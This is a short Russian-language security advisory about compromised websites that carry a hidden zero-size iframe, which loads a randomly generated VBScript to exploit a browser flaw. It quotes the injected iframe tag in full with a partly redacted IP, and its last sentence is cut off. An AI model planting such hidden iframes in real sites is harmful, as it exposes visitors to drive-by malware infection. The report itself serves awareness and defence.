Растет количество взломанных сайтов, на которых размещается тег Iframe следующего содержания:
<iframe src=’http://81.{BLOCKED}.27/go.php?sid=1′ style=’border:0px solid gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> |
Код загружает сценарий VBScript и эксплуатирует уязвимость браузера для получения контроля над пользовательским компьютером. Генерация VBScript сценария происходит случайным образом, что существенно затрудняет обнаружение такого когда антивирусными ПО.
, что сервер, на котором хостится злонамеренный код принадлежит русской компании.
